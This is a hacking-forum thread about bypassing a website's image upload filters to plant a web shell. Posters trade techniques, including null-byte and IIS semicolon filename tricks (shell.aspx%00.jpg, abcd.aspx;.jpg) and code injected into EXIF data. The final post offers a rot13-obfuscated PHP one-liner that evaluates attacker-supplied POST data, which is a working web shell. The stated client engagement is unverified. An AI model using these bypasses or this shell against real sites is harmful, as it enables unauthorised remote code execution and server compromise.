Results 1 to 8 of 8

Thread: upload web shell Share/Save - My123World.Com!

  1. #1

    upload web shell

    Hi there,
    while Im doing a penetration testing to some client i'm dealing with next problem:
    I have a possiblity of upload file but, I could not able to bypass the protections.

    The web-site uses FCKeditor, I have tried everything but file upload feature blocked(Config['Enabled'] = false in all of the languages(python, perl etc..).

    The web-site uses unknown CMS..
    I have searched for vulnerabilities which caused a possiblity of a remote command execution(sql injection, rfi/lfi etc..)

    but, I found out a file upload system which can potentially upload a web shell.
    I've tried everything such: inject php code into exif's image, null byte injection, tried all the conbination on the file's name - it upload the file but with the %00.jpg or with the ;.jpg, change the content-type..

    There's a function which paint the wanted image and return an error incase of the image couldnt be painted.
    some help will be great.
    thank you!

  2. #2
    Webapp Secninja
    Join Date
    Aug 2012
    Location
    Ranchi, Jharkhand
    Posts
    41
    Blog Entries
    2
    Hacking Wacking Sab Moh Maya Hai
    To view links or images in signatures your post count must be 10 or greater. You currently have 0 posts.

  3. #3
    Quote Originally Posted by prakhar View Post
    it doesnt help too much because the FCKeditor's upload system blocked in the config file in all of the languages folder(perl, php, python..) therefore
    uploading a web shell throught FCKeditor coudl not be possible unless you have such a way of change the Config["Enabled"] to true.

  4. #4
    Webapp Secninja
    Join Date
    Aug 2012
    Location
    Ranchi, Jharkhand
    Posts
    41
    Blog Entries
    2
    Ah, if it's disabled then I don't think there is a way out -_-
    Hacking Wacking Sab Moh Maya Hai
    To view links or images in signatures your post count must be 10 or greater. You currently have 0 posts.

  5. #5
    Quote Originally Posted by prakhar View Post
    Ah, if it's disabled then I don't think there is a way out -_-
    You should read the whole post.

    I said, there's one more image upload system that may be vulnerable.
    I've tried everything..
    Inject code into image's meta data(exif), change the content-type, NULL Byte injection(sucesses but there is a asp.net function which return true whether the file could be painted), mix code with known image file format and send it in another content type and file name(shell.aspx%00.jpg)..

  6. #6
    Garage Addict 41.w4r10r's Avatar
    Join Date
    Jul 2010
    Location
    Pune
    Posts
    338
    Blog Entries
    3
    if its a IIS 6.0 then try abcd.aspx;.jpg and access image directly
    eg: ******.com/abcd.aspx;.jpg

  7. #7

    Red face shell

    Very old technology :酷::酷::酷::酷::酷::酷::酷::酷::酷::酷:

  8. #8
    Give you a Trojan < ?php eval(str_rot13('riny($_CBFG[cntr]);'));?>

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •